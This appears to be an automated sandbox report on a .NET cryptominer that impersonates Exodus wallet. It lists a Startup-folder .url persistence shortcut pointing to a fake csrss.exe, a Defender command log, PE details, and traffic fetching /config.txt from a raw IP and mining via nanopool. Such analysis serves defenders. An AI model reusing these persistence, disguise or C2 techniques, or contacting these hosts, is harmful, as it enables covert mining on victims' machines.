                                                                                                      Process:C:\Users\user\Desktop\4rC1bQcnl5.exe
                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3627520
                                                                                                      Entropy (8bit):6.686736411250198
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:49152:JJjN9IQEiXrMhVoo5g+XoQG15WzZp13/Ln7c4lo4nC8sbXQdrb:bnIQEiUEPb
                                                                                                      MD5:D572DA9202196121D952231F26D65D07
                                                                                                      SHA1:8934580E7EE3F3852E159298769BDD38BCAA12A0
                                                                                                      SHA-256:15337A846C1E262136124361B3624DDD3519CF3C7F93ABA1ED75728A482FC662
                                                                                                      SHA-512:DE311F400E980D5FC987D6A5262057823B9DC3F9E7930623FAB16C9954977949B3B0901DE136548DB1F3A7B5D864DAD2738C791D511241CE4E49E8D83F7DEA5A
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 24%
                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X..`.................(7..0.......G7.. ...`7...@.. ........................7...........@.................................8G7.W....`7. ,....................7...................................................... ............... ..H............text....'7.. ...(7................. ..`.rsrc... ,...`7......*7.............@..@.reloc........7......X7.............@..B................tG7.....H.......<-7..............3..@.6..........................................0.............-.&(....+.&+.*....0..........s....(....t.....-.&+......+.*....~....*..0...........(......-.&+.(....+.*....*...*...*...*...*...*...*...0..'........,..{....,..{....o.......-.&&+.(....+.*..0..L........s.....:....&&.s.....:....&&.s.....:....&&.s.....:....&&.s.....:....&&.s.....:....&&.s.....:....&&..:....&.{.....o.....{......s....o.....{....r...po.....{.....P..s....o.....{.....o.....{....r...po
                                                                                                      C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe:Zone.Identifier
                                                                                                      Process:C:\Users\user\Desktop\4rC1bQcnl5.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):26
                                                                                                      Entropy (8bit):3.95006375643621
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                      Malicious:true
                                                                                                      Preview: [ZoneTransfer]....ZoneId=0
                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\viTRMUuKeV.url
                                                                                                      Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                      File Type:MS Windows 95 Internet shortcut text (URL=<"file:///C:\ProgramData\LKBNMTFJgl\csrss.exe">), ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):69
                                                                                                      Entropy (8bit):5.096227769358395
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:HRAbABGQYm8h6rXZkRE4rsjvKaBCH:HRYFVm8hAW1rsjv/E
                                                                                                      MD5:E03E6937BA1878ACE3D849B233ADECFE
                                                                                                      SHA1:AFFBB4F8B53AF6CF35660B775A0A8F70FB95F8B5
                                                                                                      SHA-256:9846A8975F8E2DBC96CD18D5015C03B4D8226FDDF69BCB99A0610C855B0A9E6D
                                                                                                      SHA-512:99EA03B8635D89409C6E65DC1DD1E995EAC8C02E373F3B01FAA7D715F347722075CC0D5D629914399505A2CA8FFB80BFA8CAFA9D99A2E702D1FCD94FB0BAECA9
                                                                                                      Malicious:true
                                                                                                      Yara Hits:
                                                                                                      • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\viTRMUuKeV.url, Author: @itsreallynick (Nick Carr)
                                                                                                      Preview: [InternetShortcut]..URL="file:///C:\ProgramData\LKBNMTFJgl\csrss.exe"
                                                                                                      C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):55
                                                                                                      Entropy (8bit):4.306461250274409
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                      Malicious:false
                                                                                                      Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                      C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
                                                                                                      Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                      File Type:data
                                                                                                      Category:modified
                                                                                                      Size (bytes):906
                                                                                                      Entropy (8bit):3.153545140169298
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:58KRBubdpkoF1AG3rAk0hAk9+MlWlLehB4yAq7ejCpk0hp:OaqdmuF3rEj+kWReH4yJ7Mcp
                                                                                                      MD5:5E8837F82BD84C668DBAB34A51F64D1B
                                                                                                      SHA1:A73C52406D31F96AAFF3AD8449C7200A582B9B5B
                                                                                                      SHA-256:9B9649C756D8EC5EB24488255A9B7EAF7465FB1D5F2D6D3ACE72E4BFC37DD2D5
                                                                                                      SHA-512:F3A28D583EFE3DB0C6B4C1FD227EF8F62145DC15007D5E3C53823B7D8073BF12B8C6C52B3C5E1B86B80ADD48F9603BA323F106341E53AA1633B72CB38599BA5F
                                                                                                      Malicious:false
                                                                                                      Preview: ........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. F.r.i. .. J.u.l. .. 2.3. .. 2.0.2.1. .2.2.:.2.5.:.3.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. F.r.i. .. J.u.l. .. 2.3. .. 2.0.2.1. .2.2.:.2.5.:.3.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

                                                                                                      Static File Info

                                                                                                      General

                                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                      Entropy (8bit):6.686736411250198
                                                                                                      TrID:
                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                                                      File name:4rC1bQcnl5.exe
                                                                                                      File size:3627520
                                                                                                      MD5:d572da9202196121d952231f26d65d07
                                                                                                      SHA1:8934580e7ee3f3852e159298769bdd38bcaa12a0
                                                                                                      SHA256:15337a846c1e262136124361b3624ddd3519cf3c7f93aba1ed75728a482fc662
                                                                                                      SHA512:de311f400e980d5fc987d6a5262057823b9dc3f9e7930623fab16c9954977949b3b0901de136548db1f3a7b5d864dad2738c791d511241ce4e49e8d83f7dea5a
                                                                                                      SSDEEP:49152:JJjN9IQEiXrMhVoo5g+XoQG15WzZp13/Ln7c4lo4nC8sbXQdrb:bnIQEiUEPb
                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X..`.................(7..0.......G7.. ...`7...@.. ........................7...........@................................

                                                                                                      File Icon

                                                                                                      Icon Hash:c0d8d8d8ccda92b0

                                                                                                      Static PE Info

                                                                                                      General

                                                                                                      Entrypoint:0x774792
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                      Time Stamp:0x60FAE058 [Fri Jul 23 15:29:28 2021 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:v4.0.30319
                                                                                                      OS Version Major:4
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:4
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:4
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                      Entrypoint Preview

                                                                                                      Instruction
                                                                                                      jmp dword ptr [00402000h]
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al

                                                                                                      Data Directories

                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x3747380x57.text
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x3760000x2c20.rsrc
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x37a0000xc.reloc
                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                      Sections

                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                      .text0x20000x3727980x372800unknownunknownunknownunknownIMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                      .rsrc0x3760000x2c200x2e00False0.369480298913data5.43010941077IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .reloc0x37a0000xc0x200False0.044921875data0.0980041756627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                      Resources

                                                                                                      NameRVASizeTypeLanguageCountry
                                                                                                      RT_ICON0x3761300x25a8data
                                                                                                      RT_GROUP_ICON0x3786d80x14data
                                                                                                      RT_VERSION0x3786ec0x380data
                                                                                                      RT_MANIFEST0x378a6c0x1b4XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators

                                                                                                      Imports

                                                                                                      DLLImport
                                                                                                      mscoree.dll_CorExeMain

                                                                                                      Version Infos

                                                                                                      DescriptionData
                                                                                                      Translation0x0000 0x04b0
                                                                                                      LegalCopyrightCopyright (c) 2015-2021 Exodus Movement, Inc.
                                                                                                      Assembly Version21.7.17.0
                                                                                                      InternalNamenotepad.exe
                                                                                                      FileVersion21.7.17.0
                                                                                                      CompanyNameExodus Movement Inc
                                                                                                      LegalTrademarks
                                                                                                      CommentsExodus
                                                                                                      ProductNameExodus
                                                                                                      ProductVersion21.7.17.0
                                                                                                      FileDescriptionExodus
                                                                                                      OriginalFilenamenotepad.exe

                                                                                                      Network Behavior

                                                                                                      Network Port Distribution

                                                                                                      TCP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Jul 23, 2021 22:24:57.863876104 CEST4971780192.168.2.545.144.225.135
                                                                                                      Jul 23, 2021 22:24:57.898330927 CEST804971745.144.225.135192.168.2.5
                                                                                                      Jul 23, 2021 22:24:57.898952007 CEST4971780192.168.2.545.144.225.135
                                                                                                      Jul 23, 2021 22:24:57.900317907 CEST4971780192.168.2.545.144.225.135
                                                                                                      Jul 23, 2021 22:24:57.929594040 CEST804971745.144.225.135192.168.2.5
                                                                                                      Jul 23, 2021 22:24:57.931662083 CEST804971745.144.225.135192.168.2.5
                                                                                                      Jul 23, 2021 22:24:57.931746960 CEST804971745.144.225.135192.168.2.5
                                                                                                      Jul 23, 2021 22:24:57.933772087 CEST4971780192.168.2.545.144.225.135
                                                                                                      Jul 23, 2021 22:24:59.907031059 CEST4971814444192.168.2.5192.99.69.170
                                                                                                      Jul 23, 2021 22:25:00.013876915 CEST1444449718192.99.69.170192.168.2.5
                                                                                                      Jul 23, 2021 22:25:00.014043093 CEST4971814444192.168.2.5192.99.69.170
                                                                                                      Jul 23, 2021 22:25:00.014426947 CEST4971814444192.168.2.5192.99.69.170
                                                                                                      Jul 23, 2021 22:25:00.121150970 CEST1444449718192.99.69.170192.168.2.5
                                                                                                      Jul 23, 2021 22:25:00.277209044 CEST1444449718192.99.69.170192.168.2.5
                                                                                                      Jul 23, 2021 22:25:00.321520090 CEST4971814444192.168.2.5192.99.69.170
                                                                                                      Jul 23, 2021 22:25:02.587523937 CEST1444449718192.99.69.170192.168.2.5
                                                                                                      Jul 23, 2021 22:25:02.634296894 CEST4971814444192.168.2.5192.99.69.170
                                                                                                      Jul 23, 2021 22:25:02.936403036 CEST804971745.144.225.135192.168.2.5
                                                                                                      Jul 23, 2021 22:25:02.936625004 CEST4971780192.168.2.545.144.225.135
                                                                                                      Jul 23, 2021 22:25:12.651432991 CEST1444449718192.99.69.170192.168.2.5
                                                                                                      Jul 23, 2021 22:25:12.822559118 CEST4971814444192.168.2.5192.99.69.170
                                                                                                      Jul 23, 2021 22:25:21.483308077 CEST1444449718192.99.69.170192.168.2.5
                                                                                                      Jul 23, 2021 22:25:21.635848045 CEST4971814444192.168.2.5192.99.69.170
                                                                                                      Jul 23, 2021 22:25:57.044884920 CEST1444449718192.99.69.170192.168.2.5
                                                                                                      Jul 23, 2021 22:25:57.184679031 CEST4971814444192.168.2.5192.99.69.170
                                                                                                      Jul 23, 2021 22:26:17.031966925 CEST4972814444192.168.2.5192.99.69.170
                                                                                                      Jul 23, 2021 22:26:17.138820887 CEST1444449728192.99.69.170192.168.2.5
                                                                                                      Jul 23, 2021 22:26:17.138916016 CEST4972814444192.168.2.5192.99.69.170
                                                                                                      Jul 23, 2021 22:26:17.139066935 CEST4972814444192.168.2.5192.99.69.170
                                                                                                      Jul 23, 2021 22:26:17.247169018 CEST1444449728192.99.69.170192.168.2.5
                                                                                                      Jul 23, 2021 22:26:17.409806967 CEST1444449728192.99.69.170192.168.2.5
                                                                                                      Jul 23, 2021 22:26:17.452634096 CEST4972814444192.168.2.5192.99.69.170
                                                                                                      Jul 23, 2021 22:26:20.789201021 CEST4971780192.168.2.545.144.225.135
                                                                                                      Jul 23, 2021 22:26:21.186917067 CEST4971780192.168.2.545.144.225.135
                                                                                                      Jul 23, 2021 22:26:21.889945030 CEST4971780192.168.2.545.144.225.135
                                                                                                      Jul 23, 2021 22:26:23.186880112 CEST4971780192.168.2.545.144.225.135
                                                                                                      Jul 23, 2021 22:26:24.255654097 CEST1444449718192.99.69.170192.168.2.5
                                                                                                      Jul 23, 2021 22:26:24.390126944 CEST4971814444192.168.2.5192.99.69.170
                                                                                                      Jul 23, 2021 22:26:24.601206064 CEST1444449728192.99.69.170192.168.2.5
                                                                                                      Jul 23, 2021 22:26:24.733905077 CEST4972814444192.168.2.5192.99.69.170
                                                                                                      Jul 23, 2021 22:26:25.687134981 CEST4971780192.168.2.545.144.225.135
                                                                                                      Jul 23, 2021 22:26:30.578176022 CEST4971780192.168.2.545.144.225.135
                                                                                                      Jul 23, 2021 22:26:40.188358068 CEST4971780192.168.2.545.144.225.135

                                                                                                      UDP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Jul 23, 2021 22:23:58.690275908 CEST6434453192.168.2.58.8.8.8
                                                                                                      Jul 23, 2021 22:23:58.718857050 CEST53643448.8.8.8192.168.2.5
                                                                                                      Jul 23, 2021 22:23:59.855005026 CEST6206053192.168.2.58.8.8.8
                                                                                                      Jul 23, 2021 22:23:59.883245945 CEST53620608.8.8.8192.168.2.5
                                                                                                      Jul 23, 2021 22:24:02.336838007 CEST6180553192.168.2.58.8.8.8
                                                                                                      Jul 23, 2021 22:24:02.371587992 CEST53618058.8.8.8192.168.2.5
                                                                                                      Jul 23, 2021 22:24:04.242376089 CEST5479553192.168.2.58.8.8.8
                                                                                                      Jul 23, 2021 22:24:04.268502951 CEST53547958.8.8.8192.168.2.5
                                                                                                      Jul 23, 2021 22:24:05.166677952 CEST4955753192.168.2.58.8.8.8
                                                                                                      Jul 23, 2021 22:24:05.204323053 CEST53495578.8.8.8192.168.2.5
                                                                                                      Jul 23, 2021 22:24:06.831135035 CEST6173353192.168.2.58.8.8.8
                                                                                                      Jul 23, 2021 22:24:06.869446993 CEST53617338.8.8.8192.168.2.5
                                                                                                      Jul 23, 2021 22:24:07.958920002 CEST6544753192.168.2.58.8.8.8
                                                                                                      Jul 23, 2021 22:24:07.986876965 CEST53654478.8.8.8192.168.2.5
                                                                                                      Jul 23, 2021 22:24:08.882920027 CEST5244153192.168.2.58.8.8.8
                                                                                                      Jul 23, 2021 22:24:08.910356045 CEST53524418.8.8.8192.168.2.5
                                                                                                      Jul 23, 2021 22:24:09.702557087 CEST6217653192.168.2.58.8.8.8
                                                                                                      Jul 23, 2021 22:24:09.737869024 CEST53621768.8.8.8192.168.2.5
                                                                                                      Jul 23, 2021 22:24:10.774203062 CEST5959653192.168.2.58.8.8.8
                                                                                                      Jul 23, 2021 22:24:10.807658911 CEST53595968.8.8.8192.168.2.5
                                                                                                      Jul 23, 2021 22:24:13.018903971 CEST6529653192.168.2.58.8.8.8
                                                                                                      Jul 23, 2021 22:24:13.047286987 CEST53652968.8.8.8192.168.2.5
                                                                                                      Jul 23, 2021 22:24:13.896255970 CEST6318353192.168.2.58.8.8.8
                                                                                                      Jul 23, 2021 22:24:13.924731016 CEST53631838.8.8.8192.168.2.5
                                                                                                      Jul 23, 2021 22:24:25.512311935 CEST6015153192.168.2.58.8.8.8
                                                                                                      Jul 23, 2021 22:24:25.547977924 CEST53601518.8.8.8192.168.2.5
                                                                                                      Jul 23, 2021 22:24:26.495665073 CEST5696953192.168.2.58.8.8.8
                                                                                                      Jul 23, 2021 22:24:26.531744003 CEST53569698.8.8.8192.168.2.5
                                                                                                      Jul 23, 2021 22:24:32.500754118 CEST5516153192.168.2.58.8.8.8
                                                                                                      Jul 23, 2021 22:24:32.549395084 CEST53551618.8.8.8192.168.2.5
                                                                                                      Jul 23, 2021 22:24:52.521028042 CEST5475753192.168.2.58.8.8.8
                                                                                                      Jul 23, 2021 22:24:52.567465067 CEST53547578.8.8.8192.168.2.5
                                                                                                      Jul 23, 2021 22:24:59.864423990 CEST4999253192.168.2.58.8.8.8
                                                                                                      Jul 23, 2021 22:24:59.900419950 CEST53499928.8.8.8192.168.2.5
                                                                                                      Jul 23, 2021 22:25:08.450411081 CEST6007553192.168.2.58.8.8.8
                                                                                                      Jul 23, 2021 22:25:08.498393059 CEST53600758.8.8.8192.168.2.5
                                                                                                      Jul 23, 2021 22:25:13.650739908 CEST5501653192.168.2.58.8.8.8
                                                                                                      Jul 23, 2021 22:25:13.688097954 CEST53550168.8.8.8192.168.2.5
                                                                                                      Jul 23, 2021 22:25:44.704058886 CEST6434553192.168.2.58.8.8.8
                                                                                                      Jul 23, 2021 22:25:44.751039028 CEST53643458.8.8.8192.168.2.5
                                                                                                      Jul 23, 2021 22:26:07.158816099 CEST5712853192.168.2.58.8.8.8
                                                                                                      Jul 23, 2021 22:26:07.206656933 CEST53571288.8.8.8192.168.2.5
                                                                                                      Jul 23, 2021 22:26:16.991628885 CEST5479153192.168.2.58.8.8.8
                                                                                                      Jul 23, 2021 22:26:17.026262999 CEST53547918.8.8.8192.168.2.5
                                                                                                      Jul 23, 2021 22:26:53.637018919 CEST5046353192.168.2.58.8.8.8
                                                                                                      Jul 23, 2021 22:26:53.674973011 CEST53504638.8.8.8192.168.2.5
                                                                                                      Jul 23, 2021 22:26:56.800901890 CEST5039453192.168.2.58.8.8.8
                                                                                                      Jul 23, 2021 22:26:56.839250088 CEST53503948.8.8.8192.168.2.5
                                                                                                      Jul 23, 2021 22:27:00.175929070 CEST5853053192.168.2.58.8.8.8
                                                                                                      Jul 23, 2021 22:27:00.210777044 CEST53585308.8.8.8192.168.2.5
                                                                                                      Jul 23, 2021 22:27:02.634422064 CEST5381353192.168.2.58.8.8.8
                                                                                                      Jul 23, 2021 22:27:02.667859077 CEST53538138.8.8.8192.168.2.5
                                                                                                      Jul 23, 2021 22:27:04.692172050 CEST6373253192.168.2.58.8.8.8
                                                                                                      Jul 23, 2021 22:27:04.735693932 CEST53637328.8.8.8192.168.2.5

                                                                                                      DNS Queries

                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                      Jul 23, 2021 22:24:59.864423990 CEST192.168.2.58.8.8.80x3194Standard query (0)xmr-us-east1.nanopool.orgA (IP address)IN (0x0001)
                                                                                                      Jul 23, 2021 22:26:16.991628885 CEST192.168.2.58.8.8.80xe0d9Standard query (0)xmr-us-east1.nanopool.orgA (IP address)IN (0x0001)

                                                                                                      DNS Answers

                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                      Jul 23, 2021 22:24:59.900419950 CEST8.8.8.8192.168.2.50x3194No error (0)xmr-us-east1.nanopool.org144.217.14.139A (IP address)IN (0x0001)
                                                                                                      Jul 23, 2021 22:24:59.900419950 CEST8.8.8.8192.168.2.50x3194No error (0)xmr-us-east1.nanopool.org144.217.14.109A (IP address)IN (0x0001)
                                                                                                      Jul 23, 2021 22:24:59.900419950 CEST8.8.8.8192.168.2.50x3194No error (0)xmr-us-east1.nanopool.org142.44.242.100A (IP address)IN (0x0001)
                                                                                                      Jul 23, 2021 22:24:59.900419950 CEST8.8.8.8192.168.2.50x3194No error (0)xmr-us-east1.nanopool.org142.44.243.6A (IP address)IN (0x0001)
                                                                                                      Jul 23, 2021 22:24:59.900419950 CEST8.8.8.8192.168.2.50x3194No error (0)xmr-us-east1.nanopool.org192.99.69.170A (IP address)IN (0x0001)
                                                                                                      Jul 23, 2021 22:26:17.026262999 CEST8.8.8.8192.168.2.50xe0d9No error (0)xmr-us-east1.nanopool.org144.217.14.139A (IP address)IN (0x0001)
                                                                                                      Jul 23, 2021 22:26:17.026262999 CEST8.8.8.8192.168.2.50xe0d9No error (0)xmr-us-east1.nanopool.org144.217.14.109A (IP address)IN (0x0001)
                                                                                                      Jul 23, 2021 22:26:17.026262999 CEST8.8.8.8192.168.2.50xe0d9No error (0)xmr-us-east1.nanopool.org142.44.242.100A (IP address)IN (0x0001)
                                                                                                      Jul 23, 2021 22:26:17.026262999 CEST8.8.8.8192.168.2.50xe0d9No error (0)xmr-us-east1.nanopool.org142.44.243.6A (IP address)IN (0x0001)
                                                                                                      Jul 23, 2021 22:26:17.026262999 CEST8.8.8.8192.168.2.50xe0d9No error (0)xmr-us-east1.nanopool.org192.99.69.170A (IP address)IN (0x0001)

                                                                                                      HTTP Request Dependency Graph

                                                                                                      • 45.144.225.135

                                                                                                      HTTP Packets

                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      0192.168.2.54971745.144.225.13580C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      Jul 23, 2021 22:24:57.900317907 CEST1402OUTGET /config.txt HTTP/1.1
                                                                                                      Accept: text/*, application/exe, application/zlib, application/gzip, application/applefile
                                                                                                      User-Agent: WinInetGet/0.1
                                                                                                      Host: 45.144.225.135
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Jul 23, 2021 22:24:57.931662083 CEST1404INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 23 Jul 2021 20:24:57 GMT
